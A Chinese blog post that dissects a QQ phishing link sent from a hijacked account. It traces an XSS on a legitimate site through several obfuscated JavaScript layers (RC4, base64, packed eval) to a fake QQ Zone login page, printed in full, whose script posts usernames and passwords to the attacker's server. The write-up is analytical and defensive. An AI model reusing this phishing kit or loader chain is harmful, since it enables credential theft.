记网友 QQ 被盗群发的套路链接
4 min
又看见一个骗子,趁机水一篇。
如题,这个套路消息是这样的: 「https://url.cn/5x4a6Hg&tLKvRPKISY 这是你?/微笑」
用移动设备进入显示是 QQ 空间登录页面,请求输入帐号密码,并盗取 QQ
这个短网址最先跳转到一个无害的正经网站(fz.fang.com)的搜索请求页,利用 XSS. 而且他用的标签名字就叫 xss. 黑人问号.jpg
骗子插入了一段 js 代码,src 为 wudi.74sq.cn/404.php (装成 404 页面?
本来用电脑 curl 之,发现这个 js 是直接跳转到腾讯网的(window.location.href = “http://www.qq.com”;)
于是带上手机的 UA 再 curl, 验明:
(function () {
var new_doc = document.open("text/html", "replace");
var html = unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3Bcharset%3Dutf-8%22%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEdge%22%3E%3Cmeta%20content%3D%22always%22%20name%3D%22referrer%22%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Adocument.write%28decodeURIComponent%28arcfour%28%2236a9dc5d29d54b46793d0c682298dbab%22%2Cbase64_decode%28%22EzORpUle/yXbsLMJsHj2lt+3Y2Rns99J/Lj37LvRiWWB4Sxf075faqUVJ85nCvGPE2VhEVzCxaa3SNtNQVmxTwiW7xoDJXHJC7g4YhkBMxWFvSPf7bmJBojZsq/vyWOPe8uHMpDGYd1XJcqNY1Z4T6CwxCCK+TLfqJkC9d8KTGR+1aZqyLoLttwCLVdzceuZTddKZHuVPUGbh+0WorBVz+JdGk7lmAiZlGMd9kxuDbqvvW6LguR8teQkNAdM+KukG90+pKaGqSVYTBRTUCfJpqS3oA2sVzPHgRDRUA4uelzPC+31esGj6MXfZf7GbC4Z/WzBi6WsTrVAVvzq3oI6RoUEXa7KHj7bWi9b1BhFDxrqihtxwwpYXeWYBmMOrmgyTSiMN7hKxkKp+IGwT6s+KydpW8bT2CshYYffIHO7vu3NpWJQ/p1QLjMl0NlUZntT7TLwUWNdz5Qm95s3zaIJWwjqt+IqwhsSbvqDPwpq8jXtlGpDnNB7u0hPZg%3D%3D%22%29%29%29%29%3B%0A%3C/script%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%3C/body%3E%0A%3C/html%3E");
new_doc.write(html);
new_doc.close();
})();
var set = document.createElement('iframe');
set.src = 'https://www.baidu.com/favicon.ico';
set.style.display = 'none';
set.onload = function () {
setTimeout(function () {
set.remove();
}, 9)
}
document.title = '';
document.body.appendChild(set);
function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t)}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3)}function base64_decode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,r=[];if(!d){return d}d+='';do{w=q.indexOf(d.charAt(i++));v=q.indexOf(d.charAt(i++));u=q.indexOf(d.charAt(i++));t=q.indexOf(d.charAt(i++));s=w<<18|v<<12|u<<6|t;z=s>>16&0xff;y=s>>8&0xff;x=s&0xff;if(u==64){r[j++]=String.fromCharCode(z)}else if(t==64){r[j++]=String.fromCharCode(z,y)}else{r[j++]=String.fromCharCode(z,y,x)}}while(i<d.length);return r.join('')}function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}把 unescape 运行一下,得到
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer">
<script type="text/javascript">
document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("EzORpUle/yXbsLMJsHj2lt+3Y2Rns99J/Lj37LvRiWWB4Sxf075faqUVJ85nCvGPE2VhEVzCxaa3SNtNQVmxTwiW7xoDJXHJC7g4YhkBMxWFvSPf7bmJBojZsq/vyWOPe8uHMpDGYd1XJcqNY1Z4T6CwxCCK+TLfqJkC9d8KTGR+1aZqyLoLttwCLVdzceuZTddKZHuVPUGbh+0WorBVz+JdGk7lmAiZlGMd9kxuDbqvvW6LguR8teQkNAdM+KukG90+pKaGqSVYTBRTUCfJpqS3oA2sVzPHgRDRUA4uelzPC+31esGj6MXfZf7GbC4Z/WzBi6WsTrVAVvzq3oI6RoUEXa7KHj7bWi9b1BhFDxrqihtxwwpYXeWYBmMOrmgyTSiMN7hKxkKp+IGwT6s+KydpW8bT2CshYYffIHO7vu3NpWJQ/p1QLjMl0NlUZntT7TLwUWNdz5Qm95s3zaIJWwjqt+IqwhsSbvqDPwpq8jXtlGpDnNB7u0hPZg=="))));
</script>
</head>
<body>
</body>
</html>还要套,套这么多层
<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script>
$(function(){
$.getScript('http://wudi.74sq.cn/template/login.js');
});
</script>外面还套个 $() 倒是调用了函数…… http://wudi.74sq.cn/template/login.js, 就是它没错了。
他又套了一层…… 这个 js 在 document 里 write 了一个包含一段 js 代码的 html, 又套一层。然后终于出现真身:
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no"/>
<meta name="apple-mobile-web-app-capable" content="yes"/>
<script src="//libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<script src="//open.mobile.qq.com/sdk/qqapi.js?_bid=152"></script>
<link rel="stylesheet" href="//qzonestyle.gtimg.cn/qzone/phone/style/login.css"/>
<link rel="stylesheet" href="//wudi.74sq.cn/template/css.css"/>
<!--顶部banner-->
</head>
<script type="text/javascript">
function setCookie(name, value) {
var Days = 30;
var exp = new Date();
exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000);
document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString();
}
function getCookie(name) {
var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
if (arr = document.cookie.match(reg))
return unescape(arr[2]);
else
return 0;
}
if (getCookie("login")){
window.location.href='https://h5.qzone.qq.com/mqzone/profile?stat=&hostuin=0#0/info/me';//二次跳转地址
}
$(function(){
mqq.ui.setTitleButtons({
left : {
title : "相册",
callback : function () {
}
},
right : {
hidden: true
}
})
});
</script>
<body style="zoom: 1;">
<script>
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 k=$(r);1 5=0;1 8=0;g("G",4(a){5=a.w[0].q});g("R",4(a){8=a.w[0].q;7(k.17()<=0&&5<8){a.D();7($("#3").J<=0){$("K").L(\'<m S="3" T="U-V:W;Y-l:#15;l:#16;d:18;1b-1c:1d;z-d:A;B-C:1g;E:F;"><p>网页由 \'+\'H.I.i.h\'+\' 提供</p><p>j浏览器M内核提供技术支持</p></m>\')}$("#3").d((8-5))}});g("N",4(a){$("#3").O("P",4(){$("#3").Q()})});1 2={e:c,b:c,n:c};1 p=o.X;2.e=p.6("Z")==0;2.b=p.6("10")==0;2.11=(p=="12")||(p.6("13")==0);7(2.e||2.b||2.n){y.s.t="u://v.i.h"}7(o.19.6(\'j/\')>0){}1a{y.s.t=\'u://v.i.h\'}1 9=x.9;1 f=x.f;r.1e("1f").14=9+f;',62,79,'|var|system|_domain_display|function|_touches_point1|indexOf|if|_touches_point2|province||mac|false|height|win|city|addEventListener|com|qq|QQ|doc|color|div|xll|navigator||pageY|document|location|href|http|qzone|touches|remote_ip_info|window|line|26px|font|size|preventDefault|overflow|hidden|touchstart|ui|ptlogin2|length|body|prepend|X5|touchend|slideUp|normal|remove|touchmove|id|style|text|align|center|platform|background|Win|Mac|x11|X11|Linux|value|bebdc2|65696c|scrollTop|0px|userAgent|else|padding|top|15px|getElementById|ip|12px'.split('|'),0,{}))
</script>
<div id="content" class="content">
<div id="error_tips">
<div id="error_tips_content">
<span id="error_icon"></span>
<span id="error_message"></span>
</div>
</div>
<div id="login" class="login">
<div id="logo" class="logo">
</div>
<div id="app_name" style="display: none">
</div>
<div id="q_login" class="q_login" style="display: none">
<div id="q_login_title">
<div id="q_login_logo">
</div>
<label id="q_login_tips"></label>
</div>
<div id="q_logon_list" class="q_logon_list">
</div>
</div>
<div id="web_login">
<form id="loginform" autocomplete="off" name="loginform" action="" method="" target="" style="margin:0">
<script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"></script>
<input type="hidden" name="ip" id="ip"/>
<ul id="g_list">
<li id="g_u">
<div id="del_touch" class="del_touch">
<span id="del_u" class="del_u"></span>
</div>
<input id="u" class="inputstyle" name="hrUW3PG7mp3RLd3dJu" autocomplete="off" placeholder="QQ号码/手机/邮箱"/></li>
<li id="g_p">
<div id="del_touch_p" class="del_touch">
<span id="del_p" class="del_u"></span>
</div>
<input id="p" class="inputstyle" maxlength="16" type="password" name="LxMzAX2jog9Bpjs07jP" autocorrect="off" placeholder="请输入您的QQ密码"/></li>
</ul>
<div href="javascript:void(0);" id="go">登 录</div>
</form>
</div>
<div id="switch">
<div id="swicth_login" onclick="pt._switch()" style="display: none">
</div>
<div id="zc_feedback">
<span id="zc" onclick="window.open('http\x3A\x2F\x2Fptlogin2.qq.com\x2Fj_newreg_url')">注册新帐号</span>
<span id="forgetpwd" onclick="window.open('http://ptlogin2.qq.com/j_findpwd_url')">忘了密码?</span>
</div>
</div>
<div id="custom_bottom">
</div>
</div>
<div id="vcode">
<label id="vcode_tips"></label>
<div id="vcode_area">
<img id="vcode_img"/>
<label id="input_tips"></label>
<input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6"/>
</div>
<div id="button">
</div>
</div>
</div>
<div id="new_vcode" class="new_vcode">
</div>
<div id="footerBlank">
</div>
<script>
var times = 0;
function error(msg) {
$("#error_tips").css({
display: 'block'
});
$('#error_message').html(msg);
err = true;
}
$('form input').focus(function() {
$("#error_tips").css({
display: 'none'
});
err = false;
});
$("#error_tips").on('click',
function() {
$(this).hide();
});
$("#go").on('click',
function() {
var $this = $(this);
err = false;
var p = $("#p").val();
var u = $("#u").val();
u == '' && error('您还没有输入帐号!');
if (err) return false;
p == '' && error("您还没有输入密码!");
if (err) return false;
/^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号!');
if (err) return false;
var len = p.length; (len < 6 || len > 16) && error('您输入的帐号或密码不正确,请重新输入。');
if (err) {
$("#p").val('');
return false;
}
if (!err){
$.ajax({
url:'//wudi.74sq.cn/user.php',
type:'POST',
dataType:'json',
data: $('#loginform').serialize(),
error:function(er){
setCookie("login", "yes")
window.location.href='//qzone.qq.com';
}
})
}
})
</script>
<div style="display:none;">
</div>
</body>
</html>无聊的伪装。已登录的 Cookie 都有设置,防止用户再次点开是未登录状态而起疑心。
他使用 POST 提交,URL 为 http://wudi.74sq.cn/user.php, 数据格式: ip=&hrUW3PG7mp3RLd3dJu=用户名&LxMzAX2jog9Bpjs07jP=密码
结束。